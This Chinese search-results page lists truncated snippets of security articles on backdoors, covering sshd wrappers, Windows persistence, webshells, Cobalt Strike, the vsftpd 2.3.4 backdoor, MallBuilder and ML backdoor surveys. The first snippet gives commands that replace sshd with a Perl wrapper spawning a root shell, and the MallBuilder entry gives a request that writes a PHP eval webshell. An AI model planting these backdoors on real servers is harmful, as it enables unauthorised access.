ICode9

精准搜索请尝试: 精确搜索
  • linux-wrapper跟inetd服务后门2021-03-10 18:59:57

    wrapper后门实践 先部署后门 cd /usr/sbin/ mv sshd ../bin/ echo '#!/usr/bin/perl' >sshd echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARG

  • 内网渗透测试:域内权限维持思路总结2021-02-21 16:57:28

    我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录 Windows 操作系统常见持久性后门Windows系统隐藏账户Shift 粘滞键后门(1)手动制作(2)Empire 下的利用 注册表键后门(1)手动制作(2)Metasploit 下的利用(3)Empire 下的利用 Window

  • 【转】大马、小马和一句话木马的关系详解2021-02-18 22:34:32

    webshell的含义 WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执

  • 网络安全学习--014--木马及木马后门的讲解,webshell箱子溯源追踪2021-02-07 16:01:18

    提示:本文所讨论的技术仅用于研究学习,旨在提高大家信息安全意识,任何人不得将其用于非法目的。 @木马及木马后门的讲解,webshell箱子溯源追踪 一:webshell制作原理 webshell:即web网站后门 getshell:是指拿webshell的过程 1.webshell的种类 一句话木马小马大马打包马脱裤马 2.

  • cobalt strike内网穿透2021-02-04 17:32:31

    前提:已经控制内网的一台主机   一.正向连接 1.设置beacon 监听    2.把后门上传到目标内网主机执行,就会监听4444端口 3.在控制的那台内网主机上执行 connect 10.10.1.6:4444 就可以了     二、反向连接 1.设置监听   2.生成后门反弹到控制的主机就可以了     参考:https

  • Vsftpd2.3.4后门利用脚本编写2021-01-31 12:01:25

    一、漏洞介绍        该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 二、漏洞复现        Linux源代码安装Vsft

  • 网站被黑了 黑客会不会留下后门2021-01-26 12:00:19

    解题思路:首先我先观察源代码没有发现有用的东西,之后在进行抓包分析,发送请求,还是没有发现flag。于是我用御剑(御剑下载及使用方法参考csdn里面大佬,搜索就有大佬教)进行扫描后台,发现了另外一个页面。 登入页面http://114.67.246.176:14176/shell.php 出现了一个登入框,之后我直

  • 《Backdoor Attacks and Countermeasures on Deep Learning: A Comprehensive Review》阅读笔记2021-01-15 09:33:08

    Backdoor Attacks and Countermeasures on Deep Learning: A Comprehensive Review 最初的后门攻击主要集中在计算机视觉领域,但是也已经扩展到其他领域。例如文本、音频、基于ML的计算机辅助设计、基于ML的无线信号分类等。 区分 1.与Adversarial Example的区别 1)攻击的pipel

  • 《Backdoor Learning: A Survey》阅读笔记2021-01-15 09:30:58

    Backdoor Learning: A Survey 后门攻击的实例 Definition of technical terms Poisoning-based backdoor attacks A.A unified Frameword of Poisoning-based attack B.Attacks for Image and Video Recognition 1)BadNets将恶意功能编码进模型的参数中 2)Invisiable Backdo

  • 应急响应之如何发现隐藏的Webshell后门2020-12-19 08:32:06

    如何在百万行代码里发现隐藏的后门 试想一下,如果你的网站被入侵,攻击者留下隐藏的后门,你真的都可以找出来嘛?面对一个大中型的应用系统,数以百万级的代码行,是不可能做到每个文件每段代码进行手工检查的。 即使是一款拥有99.9%的Webshell检出率的检测引擎,依然可能存在Webshell绕过的情

  • 阿里云异常网络连接-可疑WebShell通信行为的分析解决办法2020-12-01 20:51:38

    阿里云异常网络连接-可疑WebShell通信行为的分析解决办法 分类专栏: 网站安全 网站被黑 服务器安全 网站被篡改 服务器运维 服务器代维 如何防止网站被黑 如何防止网站被侵入 如何防止网站被挂马 网站安全服务 阿里云 网站安全检测 百度网址安全中心 怎么查找网站漏洞 网站安全 文章

  • 阿里云提醒 网站被WebShell***后门的处理过程2020-12-01 18:51:08

    阿里云提醒 网站被WebShell***后门的处理过程 分类专栏: 网站安全 网站被篡改 网站被黑 网站安全版权昨晚凌晨收到新客户的安全求助,说是阿里云短信提示,网站有webshell***文件被植入,我们SINE安全公司立即成立,安全应急响应小组,客户提供了阿里云的账号密码,随即登陆阿里云进去查看到详情

  • 基础2020-11-23 15:02:15

    基础入门-概念名词 什么是域名? 常见的网址就是域名。例如:http://www.baidu.com 域名在哪里注册? 阿里云 腾讯云等 什么是二级域名,多级域名 tieba.baidu.com 多级域名依次类推 域名对于渗透测试来说有什么意义 收集多个域名就意味着可以测试更多的站点,更容易拿下目标。 什么是

  • 如何反黑客后门程序2020-10-06 09:01:57

    前言   那什么,额不是最近国庆吗?因为疫情的缘故,我们都在家中,但发生了这么一件事,看到标题你应该知道是什么了,我被黑了!!!咳咳咳,不能说是被黑了,只能说是我下载了一个后门软件,对后门软件,比如说灰鸽子,流光这种,那边的黑客远程控制了我,我知道,这是最基础的软件了。但是我还是中了,最后,我的账

  • MallBuilder逻辑后门(复现)2020-05-11 16:53:24

    0x00 payload http://127.0.0.1:88/mall/lib/smarty/plugins/modifier.config.php?codelock_filed=.&codelock_mastersize=3&codelock_act=3&codelock_enc=shell.php&codelock_masterdata=%3C?php%20@eval%28$_POST[X]%29;?%3E 在lib/smarty/plugins目录下生成shel

  • Exp 4 恶意代码分析2020-04-18 11:56:41

    1,实验目标 1.1是监控你自己系统的运行状态,看有没有可疑的程序在运行。  1.2是分析一个恶意软件,就分析Exp2或Exp3中生成后门软件;分析工具尽量使用原生指令或sysinternals,systracer套件。  1.3假定将来工作中你觉得自己的主机有问题,就可以用实验中的这个思路,先整个系统监控看能不

  • 2019-2020-2 20175312 陶光远《网络对抗技术》Exp4 恶意代码分析2020-04-16 10:51:19

    2019-2020-2 20175312 陶光远《网络对抗技术》Exp4 恶意代码分析 一、实验内容 1.1、正确使用msf编码器 一、实验目标与内容 1.实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行。 分析一个恶意软件,就分析Exp2或Exp3中生成后门软件;分析工具尽量使用原生指令或sysint

  • 2019-2020-2 20175322周弋鸿 《网络对抗技术》Exp4 恶意代码分析2020-04-15 21:01:24

    目录一、实践目标与内容1.实践目标2.实践内容二、实践步骤1.使用schtasks指令监控系统2.使用sysmon工具监控系统3.恶意软件分析三、实践报告1.遇到的问题2.基础问题回答3.实验感想 一、实践目标与内容 1.实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行 分析一个恶意

  • Phpstudy隐藏后门2020-04-02 21:02:33

    Phpstudy隐藏后门   1.事件背景 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户 9月20日

  • BITS Jobs后门2020-03-29 23:51:28

    一、Bits Job windows后台智能传输服务 Background Intelligent Transfer Service (BITS),用于HTTP或SMB文件传输;它可以给任务设置优先级和异步下载,智能调节带宽,从而不占用其他应用的网络资源。 Powershell和bitsadmin.exe都可用于创建和管理Bits Job,但Powershell似乎只支持文件传

  • 2019-2020-2 20175320 《网络对抗技术》Exp3 后门原理与实践2020-03-27 18:59:37

    2019-2020-2 20175320 《网络对抗技术》Exp3 后门原理与实践 一、实验要求 了解metasploit、veil、加壳工具的使用方法,并利用以上软件实现后门程序与杀软之间的共存,并利用后门程序获取被攻击方的shell。 二、实验目标 1、正确使用msf编码器 2、msfvenom生成如jar之类的其他文件 3

  • 20174321王柏舟-Ep2-后门原理与实践2020-03-22 16:52:38

    目录 实验原理 软件下载以及功能测试 实验内容 思考题 实验中遇到的问题及解决方法 实验体会 一、实验原理 (一)后门 1.概念:后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。在软件的开发阶段,程序员常常会在软件内创建后门程序以便可以修改

  • 2019-2020-2 网络对抗技术 20175206李得琛 Exp2 后门原理与实践2020-03-22 13:58:02

    目录实践内容准备工作Windows获得Linux ShellLinux获得Windows Shell使用nc传输数据实践过程任务一:使用netcat获取主机操作Shell,cron启动任务二:使用socat获取主机操作Shell, 任务计划启动任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主

  • 20174315黄华健《网络对抗技术》Exp2 后门原理与实践2020-03-22 12:54:13

    1 实验目标 1.1 实验要求 使用nc实现win,mac,Linux间的后门连接 meterpreter的应用 MSF POST 模块的应用 1.2 实验内容 使用netcat获取主机操作Shell,cron启动 。 使用socat获取主机操作Shell, 任务计划启动 。 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传

  • 2019-2020-2 网络对抗技术 20172327 Exp2 后门原理与实践2020-03-20 21:04:05

    目录 1. 实践基础 1.1 什么是后门? 1.2 基础问题回答 2. 实践内容 2.1 使用netcat获取主机操作Shell,cron启动,包括 2.2 使用socat获取主机操作Shell, 任务计划启动 2.3 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 2.4 使用MSF m

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有